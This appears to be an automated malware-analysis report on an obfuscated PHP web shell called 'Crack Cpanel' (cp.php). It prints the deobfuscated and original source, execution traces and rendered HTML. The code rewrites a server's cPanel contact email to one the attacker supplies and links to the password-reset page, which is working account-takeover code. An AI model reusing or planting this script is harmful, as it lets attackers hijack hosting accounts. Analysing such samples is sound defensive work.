PHP Malware Analysis
cp.php
md5: 2219eedf7248f43bc6104bfeb5303cd7
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- error_reporting (Deobfuscated, Original, Traces)
Input
- _POST (Deobfuscated, Original)
Title
- X - Crack (Deobfuscated, HTML)
URLs
- https://i.ibb.co/hgKSY0K/cooltext317065123408510.png (Deobfuscated)
- https://l.top4top.io/p_2304qtye40.png (Deobfuscated, HTML)
Deobfuscated PHP code
<?php
error_reporting(0);
echo "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n <title>X - Crack</title>\n</head>\n<style>\n body {\n background: black;\n color: #e2e2e2;\n }\n .container {\n text-align:center;\n top: 10px;\n }\n\n .img-logo {\n height: 160px;\n border-radius: 50%;\n border: 2px solid red;\n }\n\n h3 {\n text-align: center;\n font-family: sans-serif;\n animation: color-change 1s infinite;\n font-size: 24px;\n }\n\n @keyframes color-change {\n 0% { color: red; }\n 50% { color: blue; }\n 100% { color: red; }\n }\n\n .draw {\n height:45px;\n }\n \n .wis {\n height: 25px;\n }\n \n .logo{ \n height: 120px;\n }\n \n input[type=\"email\"] { \n border-radius: 5px; \n border-bottom-color: red; \n border-top-color: red; \n border-right-color: red;\n border-left-color: red;\n padding: 10;\n }\n\n input[type=\"submit\"] {\n border-radius: 5px; \n border-bottom-color: red; \n border-top-color: red; \n border-right-color: red;\n border-left: red;\n padding: 10;\n }\n</style>\n<body>\n <div class=\"container\">\n <br>\n <br>\n <img src=\"https://l.top4top.io/p_2304qtye40.png\" class=\"img-logo\">\n <h3>Crack Cpanel</h3>\n <form action=\"#\" method=\"post\">\n <input type=\"email\" name=\"email\" placeholder=\"Email reset\"/>\n <input type=\"submit\" name=\"submit\" value=\"Gas\"/>\n </form>\n <br>\n <pre>X - MrG3P5 © 2K22</pre>\n </div>\n</body>\n</html>";
$IIIIIIIIIIII = get_current_user();
$IIIIIIIIIII1 = $_SERVER["HTTP_HOST"];
$IIIIIIIIIIlI = getenv("REMOTE_ADDR");
if (isset($_POST["submit"])) {
$email = $_POST["email"];
$IIIIIIIIIIl1 = "email:" . $email;
$IIIIIIIIII1I = fopen("/home/" . $IIIIIIIIIIII . "/.cpanel/contactinfo", "w");
fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1);
fclose($IIIIIIIIII1I);
$IIIIIIIIII1I = fopen("/home/" . $IIIIIIIIIIII . "/.contactinfo", "w");
fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1);
fclose($IIIIIIIIII1I);
$IIIIIIIIIlIl = "https://";
$IIIIIIIIIlI1 = "2083";
$IIIIIIIIIllI = $IIIIIIIIIII1 . ":2083/resetpass?start=1";
$read_named_conf = @file("/home/" . $IIIIIIIIIIII . "/.cpanel/contactinfo");
if (!$read_named_conf) {
echo "<center><h1>Bruh gk dikasih akses</h1><br><br> </pre></center>";
} else {
echo "<center>SALIN INI STER TRUZZ GASS <br><br></center>";
echo "<center><input type=\"text\" value=\"" . $IIIIIIIIIIII . "\" id=\"user\"> <button onclick=\"username()\">SALIN TEXT</button></center> <script>function username() { var copyText = document.getElementById(\"user\"); copyText.select(); document.execCommand(\"copy\"); } </script> ";
echo "<br/><center><a target=\"_blank\" href=\"https://" . $IIIIIIIIIllI . "\"><img class=\"wis\"src=\"https://i.ibb.co/hgKSY0K/cooltext317065123408510.png\"></a><br><br></center>";
}
}Execution traces
data/traces/2219eedf7248f43bc6104bfeb5303cd7_trace-1676246652.3596.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:04:38.257451]
1 0 1 0.000138 393464
1 3 0 0.000327 414840 {main} 1 /var/www/html/uploads/cp.php 0 0
2 4 0 0.000344 414840 error_reporting 0 /var/www/html/uploads/cp.php 3 1 0
2 4 1 0.000359 414880
2 4 R 22527
2 5 0 0.000374 414840 get_current_user 0 /var/www/html/uploads/cp.php 3 0
2 5 1 0.000410 414880
2 5 R 'osboxes'
1 A /var/www/html/uploads/cp.php 3 $IIIIIIIIIIII = 'osboxes'
1 A /var/www/html/uploads/cp.php 3 $IIIIIIIIIII1 = 'localhost'
2 6 0 0.000449 414880 getenv 0 /var/www/html/uploads/cp.php 3 1 'REMOTE_ADDR'
2 6 1 0.000463 414952
2 6 R '127.0.0.1'
1 A /var/www/html/uploads/cp.php 3 $IIIIIIIIIIlI = '127.0.0.1'
1 3 1 0.000488 414920
0.000515 314400
TRACE END [2023-02-12 22:04:38.257857]
Generated HTML code
<html lang="en"><head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>X - Crack</title>
<style>
body {
background: black;
color: #e2e2e2;
}
.container {
text-align:center;
top: 10px;
}
.img-logo {
height: 160px;
border-radius: 50%;
border: 2px solid red;
}
h3 {
text-align: center;
font-family: sans-serif;
animation: color-change 1s infinite;
font-size: 24px;
}
@keyframes color-change {
0% { color: red; }
50% { color: blue; }
100% { color: red; }
}
.draw {
height:45px;
}
.wis {
height: 25px;
}
.logo{
height: 120px;
}
input[type="email"] {
border-radius: 5px;
border-bottom-color: red;
border-top-color: red;
border-right-color: red;
border-left-color: red;
padding: 10;
}
input[type="submit"] {
border-radius: 5px;
border-bottom-color: red;
border-top-color: red;
border-right-color: red;
border-left: red;
padding: 10;
}
</style></head>
<body>
<div class="container">
<br>
<br>
<img src="https://l.top4top.io/p_2304qtye40.png" class="img-logo">
<h3>Crack Cpanel</h3>
<form action="#" method="post">
<input type="email" name="email" placeholder="Email reset">
<input type="submit" name="submit" value="Gas">
</form>
<br>
<pre>X - MrG3P5 © 2K22</pre>
</div>
</body></html>Original PHP code
<?php
goto UBEmK; UBEmK: ?>
<?php goto FpZ9w; FpZ9w: error_reporting(0); goto mqNz1; WC3Wz: $IIIIIIIIIIlI = getenv("\122\105\115\117\124\105\137\101\104\104\122"); goto QZXfX; QZXfX: if (isset($_POST["\163\165\142\155\151\164"])) { $email = $_POST["\x65\155\x61\151\x6c"]; $IIIIIIIIIIl1 = "\145\155\x61\x69\154\x3a" . $email; $IIIIIIIIII1I = fopen("\x2f\x68\157\155\145\57" . $IIIIIIIIIIII . "\x2f\56\x63\x70\x61\156\x65\x6c\57\143\157\x6e\164\x61\143\x74\151\156\x66\x6f", "\x77"); fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1); fclose($IIIIIIIIII1I); $IIIIIIIIII1I = fopen("\x2f\150\157\x6d\x65\x2f" . $IIIIIIIIIIII . "\57\56\143\x6f\156\x74\x61\143\x74\x69\x6e\146\x6f", "\167"); fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1); fclose($IIIIIIIIII1I); $IIIIIIIIIlIl = "\150\164\x74\x70\163\x3a\x2f\57"; $IIIIIIIIIlI1 = "\62\x30\70\x33"; $IIIIIIIIIllI = $IIIIIIIIIII1 . "\72\x32\60\70\x33\x2f\x72\145\x73\x65\164\x70\141\163\x73\77\163\x74\x61\162\164\x3d\x31"; $read_named_conf = @file("\57\x68\x6f\155\x65\57" . $IIIIIIIIIIII . "\57\56\x63\160\x61\x6e\x65\x6c\x2f\x63\157\x6e\164\141\143\164\x69\x6e\146\157"); if (!$read_named_conf) { echo "\x3c\143\145\156\164\145\x72\x3e\x3c\x68\x31\x3e\102\162\165\150\x20\147\153\x20\144\151\153\x61\x73\x69\150\x20\x61\153\163\x65\163\74\x2f\x68\61\x3e\74\x62\x72\76\74\x62\x72\x3e\40\74\x2f\x70\x72\x65\76\x3c\x2f\x63\145\156\x74\145\162\x3e"; } else { echo "\x3c\143\145\156\x74\x65\162\x3e\x53\101\x4c\x49\x4e\x20\111\116\x49\40\123\x54\x45\x52\40\124\122\125\x5a\132\x20\107\101\x53\123\40\x3c\x62\x72\x3e\74\x62\x72\76\x3c\57\143\145\156\x74\x65\162\x3e"; echo "\x3c\143\145\x6e\x74\145\x72\x3e\x3c\x69\156\x70\165\164\x20\164\x79\160\x65\75\42\164\145\x78\164\x22\40\166\141\x6c\x75\x65\x3d\x22" . $IIIIIIIIIIII . "\x22\x20\x69\x64\75\42\x75\163\145\162\42\x3e\x20\x3c\142\165\164\x74\x6f\156\x20\157\x6e\143\x6c\x69\x63\153\x3d\42\165\x73\x65\162\x6e\x61\x6d\145\x28\x29\x22\76\x53\x41\114\x49\116\x20\x54\x45\x58\124\74\x2f\142\165\x74\164\x6f\x6e\x3e\74\57\143\145\x6e\164\145\162\76\x20\74\163\x63\x72\151\x70\164\x3e\146\165\x6e\x63\x74\151\x6f\156\40\165\x73\x65\162\x6e\x61\155\145\50\x29\x20\x7b\x20\166\141\162\x20\143\x6f\x70\x79\124\145\170\x74\40\x3d\x20\144\157\x63\x75\155\x65\x6e\x74\56\x67\x65\164\x45\x6c\145\155\145\156\164\102\x79\x49\x64\x28\42\x75\163\145\x72\42\51\x3b\40\x63\157\x70\171\124\145\x78\164\56\163\145\x6c\x65\x63\x74\50\51\x3b\40\144\x6f\x63\165\x6d\145\156\x74\x2e\x65\x78\145\x63\103\157\155\155\141\156\x64\x28\x22\143\157\x70\x79\x22\51\73\40\175\40\x3c\57\x73\143\x72\151\160\164\x3e\x20"; echo "\74\x62\162\x2f\76\x3c\143\145\x6e\164\145\162\x3e\x3c\141\x20\x20\x74\x61\x72\x67\145\x74\75\42\x5f\x62\x6c\141\x6e\x6b\42\40\150\162\x65\146\75\x22" . $IIIIIIIIIlIl . '' . $IIIIIIIIIllI . "\42\x3e\x3c\151\155\x67\40\x63\154\141\x73\x73\75\x22\x77\151\x73\x22\163\x72\x63\x3d\42\150\164\x74\160\163\72\57\x2f\x69\56\151\x62\x62\56\143\157\57\150\x67\113\x53\131\60\x4b\x2f\143\157\x6f\154\x74\x65\x78\164\63\61\x37\60\x36\65\x31\62\x33\64\60\70\65\x31\x30\56\160\x6e\147\42\x3e\74\57\141\x3e\x3c\x62\x72\x3e\74\142\x72\x3e\74\x2f\143\145\156\x74\x65\162\x3e"; } } goto YlfR1; quCDA: $IIIIIIIIIIII = get_current_user(); goto E05zk; mqNz1: echo "\x3c\41\104\117\103\x54\x59\120\105\40\x68\x74\x6d\x6c\x3e\xa\x3c\x68\164\x6d\154\x20\154\141\156\x67\x3d\x22\145\156\x22\x3e\12\74\x68\145\141\144\x3e\12\x20\40\40\x20\74\x6d\x65\164\141\40\x63\x68\141\162\x73\x65\164\75\x22\x55\x54\106\55\70\42\76\xa\40\x20\40\x20\x3c\x6d\145\164\141\x20\150\x74\x74\160\55\145\161\x75\x69\166\75\42\x58\55\x55\101\55\103\157\155\x70\141\164\x69\x62\x6c\x65\x22\40\143\x6f\x6e\164\x65\x6e\x74\75\x22\111\105\x3d\x65\144\x67\145\42\76\12\40\40\40\40\x3c\155\x65\x74\141\x20\156\141\x6d\x65\75\42\x76\x69\x65\x77\160\x6f\x72\x74\x22\x20\x63\x6f\156\164\x65\156\x74\75\x22\x77\x69\x64\x74\150\75\144\145\166\x69\x63\x65\x2d\x77\x69\144\x74\150\54\x20\151\156\x69\164\151\141\x6c\55\x73\x63\x61\x6c\x65\x3d\x31\x2e\60\42\x3e\12\40\x20\40\40\74\155\145\x74\x61\x20\150\164\x74\160\55\145\x71\x75\x69\166\75\42\103\x6f\156\x74\145\156\164\x2d\124\x79\160\x65\42\x20\143\x6f\156\x74\x65\156\x74\x3d\42\164\x65\x78\164\x2f\x68\x74\155\154\x3b\x20\143\x68\x61\162\x73\145\164\75\165\x74\x66\x2d\70\42\x20\x2f\x3e\xa\40\40\x20\40\x3c\x74\x69\164\x6c\x65\76\x58\40\x2d\x20\x43\x72\x61\143\x6b\74\x2f\x74\151\164\x6c\x65\76\xa\74\57\150\x65\141\x64\76\12\x3c\163\164\171\154\145\76\12\x20\40\40\40\142\x6f\x64\x79\40\173\12\x20\x20\x20\x20\x20\x20\x20\40\x62\141\x63\x6b\147\162\157\x75\156\144\72\x20\142\154\x61\x63\x6b\73\12\40\40\40\40\x20\40\40\40\x63\x6f\x6c\x6f\x72\72\x20\x23\x65\x32\145\62\145\x32\73\12\40\x20\x20\40\175\12\x20\40\x20\40\56\143\157\156\x74\x61\151\x6e\x65\162\40\173\12\40\x20\x20\40\40\40\x20\40\x74\145\x78\164\x2d\141\x6c\x69\147\156\x3a\x63\x65\156\164\145\x72\73\12\x20\x20\x20\40\x20\40\40\40\x74\x6f\160\x3a\x20\61\60\160\x78\73\12\x20\40\40\40\x7d\12\12\x20\40\40\x20\x2e\151\155\147\x2d\x6c\157\x67\157\40\173\xa\40\x20\x20\40\x20\40\40\40\150\x65\x69\x67\x68\x74\x3a\40\x31\x36\60\x70\x78\x3b\12\x20\40\x20\x20\x20\40\40\x20\142\x6f\162\144\x65\x72\55\x72\141\144\151\165\x73\72\40\65\x30\45\73\xa\40\40\x20\40\x20\x20\40\x20\x62\157\x72\x64\145\x72\x3a\x20\x32\160\170\40\163\157\x6c\x69\144\40\x72\145\144\73\12\x20\40\x20\40\x7d\xa\xa\40\x20\40\40\x68\63\x20\x7b\12\x20\x20\40\40\x20\x20\x20\40\x74\x65\x78\164\x2d\x61\154\x69\x67\156\x3a\x20\143\x65\x6e\x74\145\162\73\xa\40\x20\x20\x20\40\40\40\x20\146\x6f\156\x74\x2d\x66\141\155\x69\x6c\x79\72\x20\x73\x61\156\163\x2d\163\x65\162\151\x66\x3b\xa\x20\40\40\40\x20\x20\x20\40\141\156\x69\x6d\141\x74\x69\x6f\x6e\72\40\143\157\154\x6f\x72\x2d\x63\x68\x61\156\x67\145\x20\61\163\x20\151\156\146\151\156\151\164\145\x3b\xa\40\40\x20\x20\40\x20\40\x20\146\x6f\156\x74\55\x73\x69\x7a\145\72\x20\x32\64\160\x78\x3b\12\x20\40\x20\x20\x7d\12\12\x20\x20\40\40\100\x6b\x65\x79\x66\162\x61\155\x65\x73\x20\143\x6f\154\157\x72\55\143\150\141\x6e\x67\x65\40\x7b\xa\40\40\40\40\40\x20\x20\40\x30\45\x20\x7b\x20\x63\157\x6c\157\x72\x3a\40\x72\x65\x64\73\40\175\xa\40\x20\x20\40\x20\40\x20\x20\x35\60\45\40\173\40\143\x6f\154\157\x72\x3a\x20\142\x6c\165\x65\x3b\40\x7d\xa\x20\40\x20\40\40\x20\x20\x20\61\x30\60\x25\x20\173\40\x63\x6f\x6c\157\162\x3a\40\x72\145\x64\x3b\40\x7d\xa\40\x20\x20\x20\175\12\12\40\x20\40\40\56\x64\162\x61\167\x20\x7b\12\40\40\x20\40\x20\40\40\40\x68\x65\151\147\150\x74\x3a\64\x35\160\x78\x3b\12\x20\40\40\x20\175\12\40\x20\40\x20\12\x20\x20\x20\40\x2e\x77\151\x73\x20\x7b\xa\40\x20\40\40\x20\40\x20\40\150\x65\151\147\150\x74\72\40\62\x35\x70\x78\73\xa\x20\40\x20\40\175\12\40\x20\40\x20\xa\40\x20\40\x20\56\154\157\147\157\x7b\x20\12\x20\x20\x20\x20\x20\x20\40\40\x68\x65\151\147\150\164\x3a\40\x31\62\x30\x70\170\73\12\x20\x20\40\40\175\xa\x20\40\x20\40\12\40\x20\x20\x20\x69\x6e\160\x75\164\133\x74\171\160\145\x3d\42\145\x6d\141\x69\x6c\42\135\x20\173\x20\12\40\40\40\40\40\x20\40\x20\142\x6f\162\x64\145\162\x2d\x72\141\x64\x69\x75\163\72\40\x35\160\x78\x3b\40\12\40\40\x20\x20\x20\x20\40\40\x62\x6f\x72\144\x65\x72\x2d\142\x6f\x74\164\x6f\155\55\x63\157\154\x6f\162\72\40\162\x65\x64\73\x20\xa\40\x20\40\x20\40\40\40\40\142\157\162\x64\x65\x72\55\164\x6f\160\x2d\x63\x6f\154\157\x72\x3a\40\x72\145\144\x3b\x20\12\40\x20\x20\40\40\40\40\x20\x62\x6f\x72\x64\145\x72\55\x72\151\147\150\x74\x2d\143\157\154\157\162\x3a\40\x72\x65\x64\x3b\xa\x20\x20\x20\40\40\40\40\40\142\x6f\162\144\145\162\55\154\145\x66\164\x2d\x63\157\x6c\157\162\72\x20\162\x65\x64\x3b\12\x20\40\x20\40\40\x20\x20\40\x70\x61\x64\144\x69\156\x67\72\40\x31\x30\73\xa\x20\40\40\40\175\12\xa\40\x20\x20\x20\151\x6e\x70\x75\x74\x5b\x74\x79\x70\x65\75\x22\163\165\x62\x6d\x69\164\x22\135\40\173\xa\40\40\x20\40\40\40\x20\x20\x62\157\x72\x64\x65\x72\55\x72\141\x64\151\x75\163\72\40\65\160\170\x3b\40\12\x20\40\40\40\40\40\x20\x20\142\157\162\144\145\x72\x2d\142\x6f\x74\x74\157\155\55\143\x6f\154\157\162\x3a\x20\x72\x65\144\73\40\12\40\40\40\x20\x20\40\x20\x20\x62\157\x72\x64\145\x72\x2d\x74\157\160\55\143\157\154\157\x72\x3a\40\x72\x65\x64\73\40\12\x20\x20\x20\40\40\x20\x20\40\142\157\x72\144\145\x72\55\162\151\x67\x68\164\x2d\x63\x6f\x6c\x6f\162\72\40\x72\x65\x64\x3b\xa\x20\40\x20\x20\x20\40\40\x20\x62\157\x72\144\x65\x72\55\x6c\x65\x66\164\72\40\162\145\144\x3b\12\40\40\40\x20\x20\40\40\x20\160\x61\x64\x64\x69\156\147\72\40\x31\x30\73\xa\40\x20\x20\x20\x7d\12\x3c\x2f\x73\164\x79\154\145\x3e\xa\x3c\x62\x6f\144\x79\76\xa\40\x20\40\40\74\x64\x69\166\40\x63\x6c\141\x73\163\x3d\x22\x63\157\x6e\164\x61\151\156\x65\x72\42\x3e\xa\40\40\x20\40\x20\40\x20\40\x3c\x62\x72\x3e\xa\x20\40\40\x20\x20\x20\40\40\x3c\142\x72\x3e\xa\40\x20\x20\x20\40\40\x20\40\74\151\155\147\40\x73\x72\143\x3d\42\150\x74\x74\160\x73\72\x2f\57\154\56\164\x6f\160\64\164\x6f\x70\56\x69\x6f\x2f\x70\x5f\62\63\x30\64\161\x74\x79\145\x34\60\x2e\160\156\147\42\x20\x63\x6c\141\x73\163\x3d\x22\x69\x6d\x67\x2d\x6c\x6f\147\x6f\42\76\xa\x20\x20\40\x20\x20\40\40\40\x3c\150\x33\x3e\103\x72\141\143\x6b\40\103\160\x61\x6e\x65\154\74\57\x68\63\x3e\12\40\x20\x20\x20\x20\x20\x20\40\x3c\146\157\162\x6d\40\141\x63\164\151\x6f\x6e\75\42\43\x22\x20\x6d\145\x74\x68\157\x64\75\x22\x70\x6f\x73\x74\42\x3e\12\x20\x20\40\x20\x20\x20\40\40\40\40\x20\x20\74\x69\156\x70\x75\164\40\x74\171\160\145\75\42\145\x6d\x61\x69\154\42\40\156\x61\x6d\x65\x3d\42\145\x6d\141\151\154\x22\x20\160\154\141\x63\x65\150\157\154\144\145\x72\x3d\42\105\x6d\141\x69\x6c\x20\162\x65\x73\145\x74\42\x2f\x3e\xa\40\x20\x20\40\x20\40\40\x20\40\x20\40\x20\x3c\151\x6e\160\x75\164\40\164\x79\x70\x65\75\42\163\165\x62\155\151\x74\42\40\156\x61\155\x65\75\x22\x73\165\142\155\151\x74\x22\x20\166\141\x6c\165\145\x3d\42\x47\x61\163\42\57\x3e\12\x20\x20\x20\40\x20\40\x20\x20\74\x2f\146\x6f\162\155\x3e\12\40\40\x20\40\40\40\40\x20\74\x62\162\x3e\xa\x20\40\40\x20\x20\x20\x20\x20\74\160\162\145\x3e\130\x20\55\40\115\x72\x47\63\x50\65\x20\x26\x63\x6f\160\171\73\40\x32\x4b\62\62\74\x2f\160\162\x65\x3e\12\x20\40\x20\x20\x3c\x2f\x64\x69\166\76\xa\x3c\57\142\157\x64\171\76\12\74\57\x68\x74\155\x6c\x3e"; goto quCDA; E05zk: $IIIIIIIIIII1 = $_SERVER["\x48\124\x54\x50\x5f\110\117\123\x54"]; goto WC3Wz; YlfR1: ?>